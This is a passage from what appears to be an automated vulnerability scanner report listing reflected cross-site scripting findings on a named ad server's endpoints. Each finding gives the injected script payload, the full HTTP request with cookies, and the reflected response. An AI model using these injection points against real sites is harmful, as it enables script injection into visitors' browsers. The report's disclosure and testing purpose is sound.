Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; mm247=AL0LE0AS0SE0CA0OP0DO0CR0BR0CO0MO0PE0PR0PU0SP0SU0DI0EX0OM0DY0RS0; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; RMFD=011PiwK1O1016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:47:12 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 262
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0c45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:38:14 GMT;path=/

<a href="https://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Securecf6b6"><script>alert(1)</script>1d151c1f552/L18/1267156266/Bottom3/USNetwork/TRACK_Default/1x1gif.html/726348573830307044726341416f7670?1267156266" TARGET=_blank>

4.688. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3 [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 453af"><script>alert(1)</script>99c2aff247f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3453af"><script>alert(1)</script>99c2aff247f?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; mm247=AL0LE0AS0SE0CA0OP0DO0CR0BR0CO0MO0PE0PR0PU0SP0SU0DI0EX0OM0DY0RS0; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; RMFD=011PiwK1O1016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:47:17 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 389
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0f45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:38:19 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure/165246727/Bottom3453af"><script>alert(1)</script>99c2aff247f/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=101155000010000511001" target="_top">
...[SNIP]...

4.689. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3 [_RM_HTML_MM_ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3

Issue detail

The value of the _RM_HTML_MM_ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 822c7"-alert(1)-"b8da27ec3b8 was submitted in the _RM_HTML_MM_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3?_RM_HTML_MM_=822c7"-alert(1)-"b8da27ec3b8 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; mm247=AL0LE0AS0SE0CA0OP0DO0CR0BR0CO0MO0PE0PR0PU0SP0SU0DI0EX0OM0DY0RS0; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; RMFD=011PiwK1O1016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:46:16 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1R10M5b|R10M5i|R1012Mr|OA016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 580
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0f45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:37:19 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA","OP","DO","CR","BR","CO","MO","PE","PR","PU","SP","SU","DI","EX","OM","DY","RS");
var mm247o = "822c7"-alert(1)-"b8da27ec3b8";
var mm247m = "";
if (mm247o.length==21) {
   var i=0;
   while (i<21) {
       mm247m += mmarray[i] + mm247o.charAt(i);
       i=i+1;
   }
}
document.cookie="mm247="+mm247m+";expires="+mm247d.toGMTString()
...[SNIP]...

4.690. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/781946036@Bottom3 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/781946036@Bottom3

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1e5f"><script>alert(1)</script>9bbe677cf54 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmediad1e5f"><script>alert(1)</script>9bbe677cf54/Retarget_Secure/781946036@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5l|O10M69|O1012Mr|O1016F7|O5016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:43 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 397
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0b45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:45 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmediad1e5f"><script>alert(1)</script>9bbe677cf54/Retarget_Secure/228520286/Bottom3/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=101155000010000511001" target="_top">
...[SNIP]...

4.691. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/781946036@Bottom3 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/781946036@Bottom3

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c01ee"><script>alert(1)</script>bb4f72e29db was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Securec01ee"><script>alert(1)</script>bb4f72e29db/781946036@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5l|O10M69|O1012Mr|O1016F7|O5016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 260
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:51 GMT;path=/

<a href="https://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Securec01ee"><script>alert(1)</script>bb4f72e29db/L18/843217270/Bottom3/USNetwork/TRACK_Default/1x1gif.html/726348573830307044726341416f7670?843217270" TARGET=_blank>

4.692. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/781946036@Bottom3 [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/781946036@Bottom3

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e249f"><script>alert(1)</script>16286ef0491 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/781946036@Bottom3e249f"><script>alert(1)</script>16286ef0491?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5l|O10M69|O1012Mr|O1016F7|O5016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:53 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 389
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:56 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure/629408528/Bottom3e249f"><script>alert(1)</script>16286ef0491/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=101155000010000511001" target="_top">
...[SNIP]...

4.693. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/781946036@Bottom3 [_RM_HTML_MM_ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/781946036@Bottom3

Issue detail

The value of the _RM_HTML_MM_ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9301d"-alert(1)-"d4991227f15 was submitted in the _RM_HTML_MM_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/781946036@Bottom3?_RM_HTML_MM_=1011550000100005110019301d"-alert(1)-"d4991227f15 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5l|O10M69|O1012Mr|O1016F7|O5016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:47:23 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|R10M5i|O10M5l|R10M5p|R10M5x|R10M62|O10M69|O1012Mr|O1016F7|O5016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 601
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0d45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:38:25 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA","OP","DO","CR","BR","CO","MO","PE","PR","PU","SP","SU","DI","EX","OM","DY","RS");
var mm247o = "1011550000100005110019301d"-alert(1)-"d4991227f15";
var mm247m = "";
if (mm247o.length==21) {
   var i=0;
   while (i<21) {
       mm247m += mmarray[i] + mm247o.charAt(i);
       i=i+1;
   }
}
document.cookie="mm247="+mm247m+";expires="+mm247d.toGMTString()
...[SNIP]...

4.694. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/816963349@Bottom3 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/816963349@Bottom3

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73248"><script>alert(1)</script>4d03b1824f5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia73248"><script>alert(1)</script>4d03b1824f5/Retarget_Secure/816963349@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M69|O1012Mr|O1016F7|O6016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 397
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0f45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:40 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia73248"><script>alert(1)</script>4d03b1824f5/Retarget_Secure/292245608/Bottom3/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=101155000010000511001" target="_top">
...[SNIP]...

4.695. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/816963349@Bottom3 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/816963349@Bottom3

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5c5f"><script>alert(1)</script>2d1714c1c8d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Securec5c5f"><script>alert(1)</script>2d1714c1c8d/816963349@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M69|O1012Mr|O1016F7|O6016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:43 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 262
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:45 GMT;path=/

<a href="https://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Securec5c5f"><script>alert(1)</script>2d1714c1c8d/L18/1843694711/Bottom3/USNetwork/TRACK_Default/1x1gif.html/726348573830307044726341416f7670?1843694711" TARGET=_blank>

4.696. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/816963349@Bottom3 [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/816963349@Bottom3

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e2e9"><script>alert(1)</script>572fba20dfd was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/816963349@Bottom32e2e9"><script>alert(1)</script>572fba20dfd?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M69|O1012Mr|O1016F7|O6016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 390
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3145525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:50 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure/1177159324/Bottom32e2e9"><script>alert(1)</script>572fba20dfd/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=101155000010000511001" target="_top">
...[SNIP]...

4.697. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/816963349@Bottom3 [_RM_HTML_MM_ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/816963349@Bottom3

Issue detail

The value of the _RM_HTML_MM_ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c16f"-alert(1)-"ce5dc795775 was submitted in the _RM_HTML_MM_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/816963349@Bottom3?_RM_HTML_MM_=8c16f"-alert(1)-"ce5dc795775 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
